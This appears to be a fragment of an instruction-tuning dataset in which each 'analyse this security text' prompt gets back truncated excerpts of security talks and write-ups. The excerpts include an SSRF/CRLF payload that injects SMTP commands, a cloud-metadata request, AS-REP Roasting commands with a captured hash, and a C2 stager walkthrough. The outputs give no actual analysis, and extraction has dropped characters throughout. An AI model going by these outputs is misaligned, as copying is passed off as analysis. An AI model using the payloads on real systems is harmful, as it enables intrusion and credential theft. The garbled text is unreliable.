HTTP Protocol It Seems Unexploitable Gopher Is Good What If There Is No Gopher Support? HTTPS What Won't Be Encrypted in a SSL Handshake? Quick Fun Example https://127.0.0.1%0D%0AHELOorange.tw%0D%0AMAILFROM:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c +127.0.0.1 ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange. ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCriminal charges are not pursued: Hacking PKI Mike Zusman Principal Consultant mike.zusman@intrepidusgroup.com About the Title  From StartCom Critical Event Report  https://blog.startcom.org/?p=161  Thanks to StartCom for quickly fixing the bug I found  These guys care about PKI! Intrepidus Group, Inc.  2008 2 Outline  Intro  The Basics  CA Domain Validation Mechanisms  Certificate Provisioning Process  Web Application Attacks  Client Side Countermeasures  CA Countermeasures  Closing Intrepidus Group, Inc.  2008 3 Intro  SSL vs SSL PKI  SSL is a sound encryption protocol  implementation specific bugs, aside  Debian PRNG  Microsoft SSL PCT Overflow (2004)  SSL PKI gives us third party trust  Site validation  Code signing  Personal certificates Intrepidus Group, Inc.  2008 4 Intro  Threat Modeling SSL PKI Intrepidus Group, Inc.  2008 5 Intro  Threat Modeling SSL PKI Intrepidus Group, Inc.  2008 6 Intro  Why hack PKI?  To exploit third-party trust  Maybe you own the DNS  Steal data with minimal residue  Targeted Attacks  SSL VPN  If software vendors do their job, endpoints will be harder to attack  Its fun!  Intrepidus Group, Inc.  2008 7 Intro  PKIs Low Hanging Fruit  Certification Authority Web Sites  You pay money for private key access  Private key access is controlled by web application logic  Web Applications are hard to secure  Oh, the irony!  The companies that sell security are not secure themselves  How can you secure the Internet, over the Internet? Intrepidus Group, Inc.  2008 8 Intro  Soft Targets  Where there is smoke, there is usually fire  Introducing, a slide-show of insecurity . . . Intrepidus Group, Inc.  2008 9 Intro - Soft Targets Intrepidus Group, Inc.  2008 10 * Note the green bar. It is definitely COMODO who is vulnerable to cross site scripting! Certificate Authority Attacks Intrepidus Group, Inc.  2008 11 Intro - Soft Targets Intrepidus Group, Inc.  2008 12 Intro - Soft Targets Intrepidus Group, Inc.  2008 13 Intro - Soft Targets Intrepidus Gr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploiting Digital Cameras Oren Isacson - oren]at[coresecurity.com Alfredo Ortega - aortega]at[coresecurity.com Exploit Writers Team Core Security Technologies August 1, 2010 Exploiting Digital Cameras August 1, 2010 1 / 27 Introduction This talk is about:  How to script Canon Powershot cameras.  How we reversed the embedded interpreter.  What are the possibilities of this?  What are the security consequences? Exploiting Digital Cameras August 1, 2010 2 / 27 Architecture of Powershot cameras  ARM type Processor (ARM946E-S based)  Memory Protection Unit (MPU)  No Memory Mapping Unit  Exception handlers  SD Memory Card  Debugging Support  Proprietary OS (DryOS) We used MPUs registers to find the memory regions And exception handlers for debugging. Exploiting Digital Cameras August 1, 2010 3 / 27 Previous works: CHDK  CHDK is an unofficial firmware enhancement.  Can be booted from the memory card.  Loads as a firmware update but it doesnt make permanent changes.  It doesnt automatically load unless the Memory Card is locked.  But users dont normally have Memory Card in locked mode.  So its safe (not a good attack vector). We used it for researching the firmware. Exploiting Digital Cameras August 1, 2010 4 / 27 Image fuzzing  Can we run code exploiting the image parsers?  The camera crashes when processing some malformed images.  We wrote an exception handler to examine the crashes.  Even if we can exploit this bugs, the exploit would be model specific. Exploiting Digital Cameras August 1, 2010 5 / 27 Firmware analysis  CHDK project provieded IDA dumps of some powershot cameras (Thanks!).  Some Interesting strings:  Syntax Error, yacc stack overflow, input in flex scanner failed, etc.  It appears that there is an embedded interpreter.  Flex lexical scanner and yacc or bison parser generator were used. Exploiting Digital Cameras August 1, 2010 6 / 27 The embedded interpreter  We are not the first ones to find the interpreter  But there is no public documentation on the language  I", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ntips 分享下今晚看的小tips => SharpC2 Client端如何生成 stager的 (SharpC2最后一版是 experimental测试版 上不了线 哈哈哈这个我们后面再聊) 功能其实并不复杂但是令我好奇的是如何生成powershell stager的因为在我去年看SharpC2时还没 有这些东西希望能够帮助一些想要学习写C2的伙伴 1. 首先Client端 使用WPF MVVM模型通过调试我们可以定位到 PayloadGenratorViewModel.cs 然后通过GetListeners() 获取所有监听器 http,tcp,smb 基于c# async await关键字 异步任务处理返回结果为 List 然后显示UI 接下来该在哪里下断呢 当我们点击Generate时 这里使用了WPF Command命令在 GeneratePayloadCommand.cs Execute()方法下断 判断OutputType 输出类型后进入GenerateStager方法 跟进 GenerateStager方法 异步任务返回结果为byte[] 这里设计的知识点是 Web api. 使用 RestSharp 这个项目(星球之前也分享过) POST方法 请求数据然后base64解码后返回这里理解 为真实生成操作封装在了TeamServer端 最后判断结果长度是否大于0进入SaveStager()方法 如果输出类型为powershell 则显示一个 Windows 就跟cs里面的 powershell一样只不过它host托管到了web 端的文件上这里直接将结果 显示出来了", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Certified Pre-Owned 背景 什么是PKI Active Directory 证书服务 (AD CS) AD CS 包括以下服务 认证机构 证书颁发机构 Web 注册 Online Responder 络设备注册服务 (NDES) 证书注册 Web 服务 (CES) 证书注册策略 Web 服务 常的CA 层次结构 环境搭建 ESCN复现-域管理员的提权 攻击路径 漏洞分析 漏洞利 ESCO 攻击路径 漏洞复现 ESCP 攻击路径 漏洞复现 ESCQ ESCS ESCT ESCV ESCW 漏洞分析 2 漏洞复现 域持久性 漏洞分析 漏洞利 Certified Pre-Owned是安全研究员@Will Schroeder和Lee Christensen在617号提出的针对 Active Directory 证书服务的个攻击法并于85在Black Hat 2021中进展示 https://www.blackhat.com/us-21/briefings/schedule/#certified-pre-owned- abusing-active-directory-certificate-services-23168 也是本较感兴趣的个议题 参考资料 AD CS 书 https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf PKI 是软件加密技术流程和服务的组合使组织能够保护其数据通信和业务交易PKI 依赖于经 过身份验证的户和受信任资源之间的数字证书交换可以使证书来保护数据并管理来组织内外的 户和计算机的身份凭证 背景 什么是PKI 3 Active Directory 证书服务 (AD CS) 提供公钥基础结构 (PKI) 功能该功能持 Windows 域上的身份 和其他安全功能即件加密电邮件加密和络流量加密它可以为组织的内部使创建验证 和撤销公钥证书 根据 Microsoft 的说法AD CS 是个服务器它允许构建公钥基础结构 (PKI) 并为组织提供公 钥加密数字证书和数字签名功能 AD CS Windows Server 是实施 PKI 解决案 AD CS 提供所有与 PKI 相关的组件作为服务每个服务负责证书基础架构的特定部分同时 协同作以形成完整的解决案 CA 的主要的是颁发证书撤销证书以及发布授权信息访问AIA和撤销信息您部署的第个 CA 将成为您内部 PKI 的根随后您可以部署位于 PKI 层次结构中的从属 CA根 CA 位于其顶部从属 CA 隐式信任根 CA并隐含地信任它颁发的证书 此组件提供了种在户使未加域或运 Windows 以外的操作系统的设备的情况下颁发和续订证 书的法 可以使此组件来配置和管理在线证书状态协议 (OCSP) 验证和吊销检查在线响应程序解码特定证书 的吊销状态请求评估这些证书的状态并返回具有请求的证书状态信息的签名响应 通过该组件路由器交换机和其他络设备可以从 AD CS 获取证书 Active Directory 证书服务 (AD CS) AD CS 包括以下服务 认证机构 证书颁发机构 Web 注册 Online Responder 络设备注册服务 (NDES) 4 此组件作运 Windows 的计算机和 CA 之间的代理客户端CES 使户计算机或应程序能够通 过使 Web 服务连接到 CA 请求更新和安装颁发的证书 检索证书吊销列表 (CRL) 下载根证书 通过互联或跨森林注册 为属于不受信任的 AD DS 域或未加域的计算机动续订证书 该组件使户能够获取证书注册策略信息结合CES它可以在户设备未加域或法连接到域控制 器的场景中实现基于策略的证书注册 证书注册 Web 服务 (CES)      证书注册策略 Web 服务 5 常的CA 层次结构有两个级别根 CA 位于顶级下级 CA 在第级颁发通常使根 CA 来构建 CA 层次结构在这种情况下根 CA 保持离线状态依赖从属 CA 颁发和管理证书 些更复杂的 CA 设计包括 常的CA 层次结构 6 具有策略 CA 的 CA 层次结构策略 CA 是从属 CA它们直接位于根 CA 之下并位于 CA 层次 结构中的其他从属 CA 之上使策略 CA 向其从属 CA 颁发 CA 证书 具有交叉认证信任的 CA 层次结构在这种情况下当个层次结构中的 CA 向另个层次结构中 的 CA 颁发交叉认证的 CA 证书时两个独的 CA 层次结构会互操作执此操作时将在不同 CA 层次结构之间建相互信任   环境搭建 7 在DC上安装证书服务 勾选证书颁发机构(实际情况下有时也会勾选web服务因为有时会到其web服务的些功能这仅 勾选web服务) 进AD CS进配置", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhen tapes go missing..... Robert Stoudt IBM-ISS RStoudt@us.ibm.com It is important for customers to note that these tapes cannot be read without specific computer equipment and software. The missing tapes require a tape drive to be read, and cannot be viewed from a PC The administration continues to maintain that it does not believe the information has been accessed because it would require specific hardware, software and expertise. Game Time It is important for customers to note that these tapes cannot be read without specific computer equipment and software. President & CEO Hortica Robert McClellan The missing tapes require a tape drive to be read, and cannot be viewed from a PC IBM spokesman Fred McNeese .... continues to maintain that it does not believe the information has been accessed because it would require specific hardware, software and expertise. Ohio State \"The administration\" When tapes go missing..... Agenda  Reported cases in the media  Cost of losing media  Data Breach Laws  Recovering the data  Protecting Your Media 'Reported' cases of lost media  July 4, 2007  Ohio  400,000 State employees, Taxpayers, Schools,...  Apr. 6, 2007  Hortica  SSN, DL, Bank Acc  May 15, 1007  IBM  SSN, DOB, Addresses  Jan. 19, 2007  U.S. IRS via City of Kansas City  26 tapes.......  Sept. 7, 2006  Circuit City and Chase  2.6 million cardholders  June 6, 2005  CitiFinancial  3,900,000 * http://www.privacyrights.org/ar/ChronDataBreaches.htm At what COST  Impact to the company:  trade secrets  confidential financial information  customer data  employee data  company image  Civil Damages  Tech//404 Data Loss Cost Calculator  examples given ranging from $1,000-$21,000 pp  http://www.tech-404.com/calculator.html Case in point - Ohio  Akron Beacon Journal - Stolen tape  The state is paying more than $700,000 to provide all state employees with identity-theft protection services and to hire an independent computer expert to review what data the tape contained.  Tape stolen June", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n云影实验室 1 / 11 .NET 高级代码审计第四课 JavaScriptSerializer 反序列化漏洞 Ivan1ee@360 云影实验室 2019 年 03 月 01 日 云影实验室 2 / 11 0X00 前言 在.NET 处理 Ajax 应用的时候通常序列化功能由 JavaScriptSerializer 类提供它 是.NET2.0 之后内部实现的序列化功能的类位于命名空间 System.Web.Script.Serialization通过 System.Web.Extensions 引用让开发者轻 松实现.Net 中所有类型和 Json 数据之间的转换但在某些场景下开发者使用 Deserialize 或 DeserializeObject 方法处理不安全的 Json 数据时会造成反序列化攻 击从而实现远程 RCE 漏洞本文笔者从原理和代码审计的视角做了相关介绍和复现 0X01 JavaScriptSerializer 序列化 下面先来看这个系列课程中经典的一段代码 TestClass 类定义了三个成员并实现了一个静态方法 ClassMethod 启动进程 序列 化通过创建对象实例分别给成员赋值 云影实验室 3 / 11 使用 JavaScriptSerializer 类中的 Serialize 方法非常方便的实现.NET 对象与 Json 数据 之间的转化笔者定义 TestClass 对象常规下使用 Serialize 得到序列化后的 Json {\"Classname\":\"360\",\"Name\":\"Ivan1ee\",\"Age\":18} 从之前介绍过其它组件反序列化漏洞原理得知需要 __type 这个 Key 的值要得到这个 Value 就必须得到程序集全标识包括程序集名称版本语言文化和公钥那么在 JavaScriptSerializer 中可以通过实例化 SimpleTypeResolver 类作用是为托管类型 提供类型解析器可在序列化字符串中自定义类型的元数据程序集限定名称笔者将代 码改写添加类型解析器 JavaScriptSerializer jss = new JavaScriptSerializer(new SimpleTypeResolver()); 这次序列化输出程序集的完整标识如下 {\"__type\":\"WpfApp1.TestClass, WpfApp1, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\",\"Classname\":\"360\",\"Name\":\"Ivan1ee\",\"Age\":18} 0x02 JavaScriptSerializer 反序列化 2.1反序列化用法 反序列化过程就是将 Json 数据转换为对象在 JavaScriptSerializer 类中创建对象然后 调用 DeserializeObject 或 Deserialize 方法实现的 云影实验室 4 / 11 DeserializeObject 方法只是在 Deserialize 方法上做了一层功能封装重点来看 Deserialize 方法代码中通过 JavaScriptObjectDeserializer.BasicDeserialize 方法返 回 object 对象 在 BasicDeserialize 内部又调用了 DeserializeInternal 方法当需要转换为对象的时候 会判断字典集合中是否包含了 ServerTypeFieldName 常量的 Key ServerTypeFieldName 常量在 JavaScriptSerializer 类中定义的值为__type, 剥茧抽丝忽略掉非核心方法块 ConvertObjectToType ConvertObjectToTypeMain ConvertObjectToTypeInternal最后定位到 ConvertDictionaryToObject 方法内 云影实验室 5 / 11 这段代码首先判断 ServerTypeFieldName 存在值的话就输出赋值给对象 s第二步将 对象 s 强制转换为字符串变量 serverTypeName第三步获取解析器中的实际类型并 且通过 System.Activator 的 CreateInstance 构造类型的实例 Activator 类提供了静态 CreateInstance 方法的几个重载版本调用方法的时候既可以 传递一个 Type 对象引用也可以传递标识了类型的 String方法返回对新对象的引用 下图 Demo 展示了序列化和反序列化前后的效果 反序列化后得到对象的属性打印输出当前的成员 Name 的值 云影实验室 6 / 11 2.2打", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nReaping and breaking keys at scale: when crypto meets big data Nils Amiet Yolan Romailler August 2018  DEF CON 26 Warning: These slides are not up to date Get the latest slides from: https://research.kudelskisecurity.com/ Warning: if you want to test your keys live You can go to our website: keylookup.kudelskisecurity.com and submit your key to test it against our dataset! If the key is already known, results are immediate, otherwise youll have to check back later. Well come back to this during our demo. The problem  Asymmetric cryptography relies on two type of keys:  the public key, that anybody can use to encrypt/verify data.  the private key, that should remain secret and allows for decryption/signing of the said data.  Tons of public keys are out there:  TLS/SSL  SSH  PGP,   Can public keys leak data about the private keys? Crypto recap  RSA (RivestShamirAdleman)  Choose two large prime numbers p and q  Public key (n, e)  with n = p * q  and some e such that e and λ(n) are coprime  Private key (n, d) where d  e1 (mod λ(n))  Message encryption  c  me (mod n)  Ciphertext decryption  m  cd (mod n)  RSA security relies on the hardness of the integer factorization problem Crypto recap (contd)  ECC (Elliptic Curve Cryptography)  Security based on the hardness of the EC discrete logarithm problem  It is hard to retrieve the integer d, knowing the points G and Q=dG  Working with an elliptic curve C  Private key is an integer d  Public key is a point Q = (x, y) = dG  where (x, y) are the coordinates of the point on a given known curve Passive attacks on public keys  The Return of Coppersmiths Attack (ROCA)  RSA modulus factorization (Batch GCD)  Invalid parameters  DSA generator  Key sizes  Invalid curve attacks  Batch GCD already used in 2010, 2012, 2016 to break weak keys  on datasets <100M keys  These are all known attacks!  And they are completely passive, the target is left unaware Collecting public keys  X.509 certificates  HTTPS, on IPv4 range and on CT domain na", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# DC: 2 下载地址https://download.vulnhub.com/dc/DC-2.zip ## 实战演练 发现靶场IP`192.168.32.160` ![image-20220622101733185](../../.gitbook/assets/image-20220622101733185.png) 扫描对外开放端口 ``` (rootkali)-[~/Desktop] # nmap -sT -sV -p1-65535 192.168.32.160 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-21 22:19 EDT Nmap scan report for 192.168.32.160 Host is up (0.00097s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) MAC Address: 00:0C:29:BA:64:08 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.32 seconds ``` 浏览器访问80端口 ![image-20220622102426125](../../.gitbook/assets/image-20220622102426125.png) 会跳转到`dc-2`的域名需要本地hosts ``` (rootkali)-[~/Desktop] # cat /etc/hosts 192.168.32.160 dc-2 ``` 再次访问可以看到有正常的内容可以看到这是一个`wordpress`框架 ![image-20220622102602079](../../.gitbook/assets/image-20220622102602079.png) 点击页面查看发现有个flag提示需要使用`cewl`生成字典 ![image-20220622105214720](../../.gitbook/assets/image-20220622105214720.png) 使用wpscan进行扫描 ``` (rootkali)-[~/Desktop] # wpscan --url http://dc-2 _______________________________________________________________ __ _______ _____ \\ \\ / / __ \\ / ____| \\ \\ /\\ / /| |__) | (___ ___ __ _ _ __  \\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\ \\ /\\ / | | ____) | (__| (_| | | | | \\/ \\/ |_| |_____/ \\___|\\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.14 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]N [+] URL: http://dc-2/ [192.168.32.160] [+] Started: Tue Jun 21 22:45:26 2022 Interesting Finding(s): [+] Headers | Int", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x01 起因 前两天和朋友聊天他发现了家在hackerone上赏颇的Program并且发现了其中的漏洞 让夫羡慕不已 去hackerone看了看商信息漏洞奖励确实是常诱的 且BugBounty Program Launched on Apr 2015.... 8年hackerone的商了业务点本来就不多被世界各国逼的客们挖了年难度可想知 但是为了赏迎难上才应该是真正的漏洞猎该有的格 0x03 业务点万念俱灰到发现敏感请求 从Hackerone的Program scope中搜集了下业务信息虽然展开测试 测试了常规的些WEB漏洞IDOR等漏洞发现完全没有点机会Filter和鉴权写的常过硬且户都是通 过uuid类型来传参进身份鉴权 先标没有IDOR其次哪怕有IDOR也常难以利 从晚上九点测到了第天凌晨两点啥也没测出来万念俱灰准备洗洗睡了 但是想还是看看Burp的HttpHistory吧万有没注意的敏感请求呢 结果没想到还真就看到了个graphql的敏感查询请求 url在json中传参测啥漏洞我想家应该都懂 Burp的Collaborator测试dnslog POST /agw/graphql?op=UrlReachableVerifierQuery&client_trace_id=09bee58d-8358-4f00-acc0- 8d26d0018d32,rst:1678201703792 HTTP/1.1 Host: xxxxx Cookie: xxxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json Authorization: xxxxx Content-Length: 386 Origin: https://xxxxx Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Te: trailers Connection: close {\"operationName\":\"UrlReachableVerifierQuery\",\"variables\":{ \"url\":\"http://xxxx.com/\"},\"query\":\"query UrlReachableVerifierQuery($url: String!) {\\n verifyUrlReachable(url: $url) {\\n ... on UrlReachableResult {\\n url\\n __typename\\n }\\n ... on GenericError {\\n errorCode\\n message\\n __typename\\n }\\n __typename\\n }\\n}\\n\"} 果不其然收到了来两个IP的Http Request但是标的回显少的可怜 只有url__typename两个键的JSON返回了回来 查了下两台发送请求的服务器都部署在GoogleCloud瞬间就让兴奋了起来 但是想了下萎了GoogleCloud meta data(元数据)的获取不像国内的某某云其必须带有特定的Header 这个SSRF点既没有回显也没法通过构造恶意的js发送带有header的数据真是操蛋 request example: curl \"http://metadata.google.internal/computeMetadata/v1/instance/image\" -H \"Metadata- Flavor: Google\" 思前想后寻思也算个盲SSRF先交了再说 0x04 秒忽略NoBugBounty到利Graphql发掘新的攻击 交完这个盲SSRF点睡了觉起来发现直接被商的安全团队给忽略了 真是操蛋盲SSRF看样不太混不到钱我们必须得发掘新的攻击 不了解Graphql的兄弟可以看下下这张图动地解释了Restful类型接和Graphql接的区别上为 restful接请求样式下为graphql的接请求样式 既然这个点是基于Graphql进查询的 那么我们可以定义查询的column(param)如果存在该column那么就会返回这个参数的有效结果话不说 开始FUZZ 最终结果让常寒啥勾东也没有(这当时的图忘存了) 再次陷万念俱灰但是仔细观", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPage 1 of 37 Whitepaper: Bypassing Port Security In 2018  Defeating MACsec and 802.1x-2010 DEF CON 26 Pre-Release Version Gabriel Ryan (@s0lst1c3) August 2018 Last Modified: 7/20/18 6:44:00 AM Page 2 of 37 Disclaimer and Updates This whitepaper is an early version designed for pre-release prior to DEF CON 26. All content will be updated by the time of the presentation at DEF CON 26 in August 2018. Final versions of all content will be available at:  https://digitalsilence.com/blog/ Page 3 of 37 Author Contact Information Author: Gabriel Ryan, Co-Founder / Senior Security Assessment Manager Digital Silence Email: gabriel@digitalsilence.com Twitter: @s0lst1c3 LinkedIn: linkedin.com/in/ms08067/ Github: github.com/s0lst1c3 Phone: +1-410-920-8101 SendSafely Secure Link: https://digitalsilence.sendsafely.com/u/gabriel Public Key Fingerprint: 5017 5C8B C1A7 31A0 80E4 9110 17C2 6CC7 BA33 3B45 Page 4 of 37 Abstract Existing techniques for bypassing wired port security are limited to attacking 802.1x-2004, which does not provide encryption or the ability to perform authentication on a packet-by-packet basis [3][4][6]. The development of 802.1x- 2010 mitigates these issues by using MACsec to provide Layer 2 encryption and packet integrity checks to the protocol [7]. Since MACsec encrypts data on a hop-by-hop basis, it successfully protects against the hub, bridge, and injection-based attacks pioneered by Steve Riley, Abb, and Alva Duckwall [7][8]. In addition to the development of 802.1x-2010, improved 802.1x support by peripheral devices such as printers also poses a challenge to attackers. Gone are the days in which bypassing 802.1x was as simple as finding a printer and spoofing a MAC address  hardware manufacturers have gotten smarter. In this paper, we introduce the Rogue Gateway and Bait n Switch attacks, which together can be used to bypass 802.1x-2010 and MACsec when weak EAP methods are used. Additionally, we introduce the EAP-MD5 Forced Reauthentication attack exploi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.de Sh \\\" Subsection .br .if t .Sp .ne 5 .PP \\fB\\\\$1\\fR .PP .. .de Sp \\\" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de Ip \\\" List item .br .ie \\\\n(.$>=3 .ne \\\\$3 .el .ne 3 .IP \"\\\\$1\" \\\\$2 .. .TH \"NMBD\" 8 \"\" \"\" \"\" .SH NAME nmbd \\- 向客户端提供构造在IP之上的NetBIOS名字服务的NetBIOS名字服务器 .SH \"总览 SYNOPSIS\" \\fBnmbd\\fR [-D] [-F] [-S] [-a] [-i] [-o] [-h] [-V][-d <debug level>] [-H <lmhosts file>] [-l <log directory>][-n <primary netbios name>] [-p <port number>] [-s <configuration file>] .SH \"描述 DESCRIPTION\" .PP 此程序是 \\fBSamba\\fR(7) 套件的一部分 .PP \\fBnmbd\\fR 是一个回应构造于IP之上的NetBIOS名字服务请求的服务器这些请求由SMBD/CIFS 客户(如Windows 95/98NT和LanManager客户)产生当然它也参与构造Windows的\"网 络邻居查看的浏览协议 .PP 当SMB/CIFS客户机启动时会试图查找一个SMB/CIFS服务器说得更精确些就是它们要知道 正在使用的主机对应的IP地址 .PP 在其它的服务中\\fBnmbd\\fR 将监听这样的请求如果客户自身的NetBIOS名字已被指定的话就用正 在运行的主机IP地址回复它这个自身的NetBIOS名字在默认情况下将是正在运行的主机在 DNS中的名字但可以用 \\fB-n\\fR 参数(查看后面关于OPTIONS的描述)越过它从而\\fBnmbd\\fR 将用它自已的名字来回应广播查询要让 \\fBnmbd\\fR 回应额外名字的话可以在\\fBsmb.conf\\fR(5)配置文件中通过参数来设定 .PP \\fBnmbd\\fR 也可用作一个WINS(Windows互联网名称服务)服务器它作为WINS数据库服务器运作时用名字注册请求来建立一个数据库以接收和回应客户对这些名字的查询 .PP 另外\\fBnmbd\\fR 也可以作WINS代理转发用户不能直接以WINS协议和WINS服务器交谈的广播查询 .SH \"选项 OPTIONS\" .TP -D 如果指定这个参数的话将使 \\fBnmbd\\fR 作为一个后台守护程序运行这样它分配本身的进程在后台运行并监视适当的端口请求在默认情况下 \\fBnmbd\\fR 通常以命令行方式启动后台运行 \\fBnmbd\\fR 也能通过\\fBinetd\\fR 这个超级守护程序来启动但不推荐这样做 .TP -F If specified, this parameter causes the main \\fBnmbd\\fR process to not daemonize, i\\&.e\\&. double-fork and disassociate with the terminal\\&. Child processes are still created as normal to service each connection request, but the main process does not exit\\&. This operation mode is suitable for running \\fBnmbd\\fR under process supervisors such as \\fBsupervise\\fR and \\fBsvscan\\fR from Daniel J\\&. Bernstein's \\fBdaemontools\\fR package, or the AIX process monitor\\&. .TP -S If specified, this parameter causes \\fBnmbd\\fR to log to standard output rather than a file\\&. .TP -i If this parameter is specified it causes the server to run \"interactively\", not as a daemon, even if the server is executed on the command l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 本地部署 --- <center><h1>本地部署</h1></center> --- ### Docker 部署推荐 ```bash docker pull teamssix/twiki:main docker run --name twiki -d -p 7777:80 teamssix/twiki:main ``` 然后直接访问本地 IP 的 7777 端口即可 ### 手动部署 ::: warning 注意 需要本地先安装 node 且版本大于或等于 12推荐使用 12.22.12 版本 ::: ```bash git clone https://github.com/teamssix/TWiki.git --depth 1 cd TWiki npm install --global yarn yarn install yarn docs:build ``` build 完之后将 docs/.vuepress/dist 目录下的文件复制到你的 nginx 或者 apache 服务的网站根目录下即可 <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年8月12日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# AS-REP Roasting攻击 > Windows 2008 R2 ## 简介 AS-REP Roasting是一种针对使用Kerberos协议进行身份验证的攻击其目的是利用Kerberos漏洞以获取活动目录中的用户凭据 Kerberos是一种网络身份验证协议用于在计算机网络上安全地验证用户和服务Kerberos协议使用票据ticket来验证用户身份在活动目录中用户凭据包括密码散列和KERBEROS的AES密钥 AS-REP Roasting利用Kerberos协议中的一个漏洞即在某些情况下允许攻击者通过发送具有无效身份验证请求AS-REQ来收集AS-REP响应AS-REP响应包含用户的加密AES密钥**攻击者可以将其用于破解密码散列并获得用户凭据** ```mermaid sequenceDiagram participant Attacker participant DomainController participant Victim Attacker ->> DomainController: 发送无效身份验证请求AS-REQ DomainController -->> Attacker: 发送身份验证错误KRB5KDC_ERR_PREAUTH_REQUIRED Attacker ->> Victim: 发送AS-REQ请求请求不需要预身份验证 Victim -->> Attacker: 发送AS-REP响应包含用户加密的AES密钥 Attacker ->> DomainController: 使用加密的AES密钥尝试破解密码散列 DomainController -->> Attacker: 发送密码散列 ``` ## 环境搭建 域用户设置了选项\"**Do not require Kerberos preauthentication**\"**通常情况下该选项默认不会开启** ![image-20220701171152441](../../.gitbook/assets/image-20220701171152441.png) ![image-20220701172115379](../../.gitbook/assets/image-20220701172115379.png) ## 漏洞利用 ### rubeus 使用rubeus.exe获得Hash ```css Rubeus.exe asreproast ``` ![image-20220701172146854](../../.gitbook/assets/image-20220701172146854.png) ### powershell 使用的`powerview.ps1`查找域中设置了 \"不需要kerberos预身份验证\" 的用户 ```powershell Import-Module .\\powerview.ps1 Get-DomainUser -PreauthNotRequired ``` ![image-20220701172830454](../../.gitbook/assets/image-20220701172830454.png) 使用`ASREPRoast.ps1`获取AS-REP返回的Hash ```powershell PS C:\\> Get-ASREPHash -UserName hacker -Domain sectest.com $krb5asrep$hacker@sectest.com:d0a157853391aab1e8e01bc686fb163a$809336bab609b5471e00dfd086ec87a1b2dcaa329c36753a0da5ecba 7c360e3aefb21c07a363139c9f0aeff96da09345137fc6b2a4320cec2be50a7a1f91548881c933f968657018c29fab4f7c370d48ad1bf4484164dfc 0435b1a6ca8313280d1b8c854da0e97191a35b94e2065020e2712b9ae9ed11b4be4c8d0d213c8dd8e462c1c2192b9e3904bc1ccea93e956cbcb442d 72d9e1fbacc81a261482e08a601c82b7927bc15e8ec2fd36725bc4d7a50a2a7519000896a7205ab87890584076a14c818f185ff206f2fb957324ec3 d591e2e623d1a14d5732fced962db9d5fcfae397c7bcb4ead5e5608 PS C:\\> PS C:\\> P", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHardware Hacking for us dumb software guys My Story  Done software since 1999  Degree in Computer Science  Done a little hardware over the years  About five years ago bought a Microchip PIC Kit  The labs were cool and easy to get working  Anything practical was difficult (low level assembly) Defcon 17  Bought all the hardware hacking villiage kits at Defcon 17  Picked up an Arduino shortly after Defcon  Was given a decent soldering iron  Started building my own projects Hardware hacking is daunting for many computer hackers  understanding all the electrical components and complex circuits  cost  steep learning curve for some languages used in electronics (i.e. assembly)  lack of good information and good community support for many devices Microcontrollers mix hardware and software  You can drop code on them instead of building complex circuits in some places  You can reprogram them to be something else whenever you want Arduinos  Open-Source hardware platform  All-in-one prototyping board  Easy to learn language  Free, Open Source IDE  Strong Community Backing  Cheap (around $30) Kind of like the hardware equivalent of a scripting language Whats an Arduino? Arduino Duemilanove  ATmega328p  14 